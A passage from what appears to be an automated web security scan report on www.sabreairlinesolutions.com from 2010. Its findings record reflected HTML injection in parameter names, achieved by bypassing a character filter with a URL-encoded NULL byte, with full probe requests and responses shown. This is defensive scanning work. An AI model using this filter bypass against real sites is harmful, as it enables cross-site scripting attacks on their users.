The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product/sabre_aircentre_crew_qualifier?%00cdd01"><a>07b8258c1ef=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322624; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3Bi%3A4%3Bs%3A45%3A%22%2Fproducts_services%2Ffrequent_flyer_management%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:11:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322624; expires=Thu, 06-Oct-2011 02:11:14 GMT; path=/
Set-Cookie: exp_last_activity=1286349074; expires=Thu, 06-Oct-2011 02:11:14 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fproducts_services%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A32%3A%22%2Fproducts_services%2Fcredit_suite%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:12:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22829


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/sabre_aircentre_crew_qualifier?%00cdd01"><a>07b8258c1ef=1">
...[SNIP]...

3.134. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_community_portal [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_community_portal

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00422ae"><a>63ba76bb82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 422ae"><a>63ba76bb82 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product/sabre_community_portal?%00422ae"><a>63ba76bb82=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:09:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316560; expires=Wed, 05-Oct-2011 17:09:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A50%3A%22%2Fproducts_services%2Fproduct%2Fsabre_community_portal%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:09:34 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/sabre_community_portal?%00422ae"><a>63ba76bb82=1">
...[SNIP]...

3.135. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_reaccommodation_manager/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0044679"><a>67dc0282d92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 44679"><a>67dc0282d92 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product/sabre_reaccommodation_manager/?%0044679"><a>67dc0282d92=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 16:58:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286315923; expires=Wed, 05-Oct-2011 16:58:43 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 16:59:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23179


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/sabre_reaccommodation_manager/?%0044679"><a>67dc0282d92=1">
...[SNIP]...

3.136. http://www.sabreairlinesolutions.com/home/products_services/product_index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product_index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007974b"><a>89efa2fb4bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7974b"><a>89efa2fb4bb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product_index?%007974b"><a>89efa2fb4bb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:13:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322639; expires=Thu, 06-Oct-2011 09:13:04 GMT; path=/
Set-Cookie: exp_last_activity=1286374383; expires=Thu, 06-Oct-2011 09:13:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:13:19 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 85750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/products_services/product_index?%007974b"><a>89efa2fb4bb=1">
...[SNIP]...

3.137. http://www.sabreairlinesolutions.com/home/products_services/product_index [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product_index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00d10f1<a>b0e40c23345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d10f1<a>b0e40c23345 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/product_index?%00d10f1<a>b0e40c23345=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3Bi%3A4%3Bs%3A40%3A%22%2Fproducts_services%2Felectronic_ticketing%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:17:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322639; expires=Thu, 06-Oct-2011 09:17:14 GMT; path=/
Set-Cookie: exp_last_activity=1286374634; expires=Thu, 06-Oct-2011 09:17:14 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A1%3Bs%3A20%3A%22%2Fincludes%2Fform_demo%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A52%3A%22%2Fproducts_services%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_planner%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:17:32 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 85746


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>b0e40c23345=1">product index?%00d10f1<a>b0e40c23345=1</a>
...[SNIP]...

3.138. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0030872<a>2cdec2710d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30872<a>2cdec2710d7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/services/airline_community?%0030872<a>2cdec2710d7=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322629; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A3%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3Bi%3A4%3Bs%3A50%3A%22%2Fproducts_services%2Fautomated_exchange_and_refunds%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:32:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322629; expires=Thu, 06-Oct-2011 03:32:53 GMT; path=/
Set-Cookie: exp_last_activity=1286353973; expires=Thu, 06-Oct-2011 03:32:53 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:33:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>2cdec2710d7=1">airline community?%0030872<a>2cdec2710d7=1</a>
...[SNIP]...

3.139. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f90d8"><a>16834f00eec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f90d8"><a>16834f00eec in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/services/airline_community/?%00f90d8"><a>16834f00eec=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:24:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322217; expires=Thu, 06-Oct-2011 03:24:56 GMT; path=/
Set-Cookie: exp_last_activity=1286353496; expires=Thu, 06-Oct-2011 03:24:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:25:04 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21297


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a href="/home/products_services/services/airline_community/?%00f90d8"><a>16834f00eec=1">
...[SNIP]...

3.140. http://www.sabreairlinesolutions.com/home/products_services/services/airline_community/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/airline_community/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00df39f<a>023789d0898 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as df39f<a>023789d0898 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/services/airline_community/?%00df39f<a>023789d0898=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322217; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A2%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A4%3Bs%3A49%3A%22%2Fproducts_services%2Fenterprise_operations%2Fairport%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:26:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322217; expires=Thu, 06-Oct-2011 03:26:34 GMT; path=/
Set-Cookie: exp_last_activity=1286353594; expires=Thu, 06-Oct-2011 03:26:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fproduct%2Ftechnical_records_hub%2F%22%3Bi%3A2%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_movement_control%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:26:54 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<a>023789d0898=1">?%00df39f<a>023789d0898=1</a>
...[SNIP]...

3.141. http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/services/consulting_services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %002bc49<a>094e5b00dcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bc49<a>094e5b00dcb in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/products_services/services/consulting_services?%002bc49<a>094e5b00dcb=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:29:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322619; expires=Thu, 06-Oct-2011 03:29:29 GMT; path=/
Set-Cookie: exp_last_activity=1286353769; expires=Thu, 06-Oct-2011 03:29:29 GMT; path=/
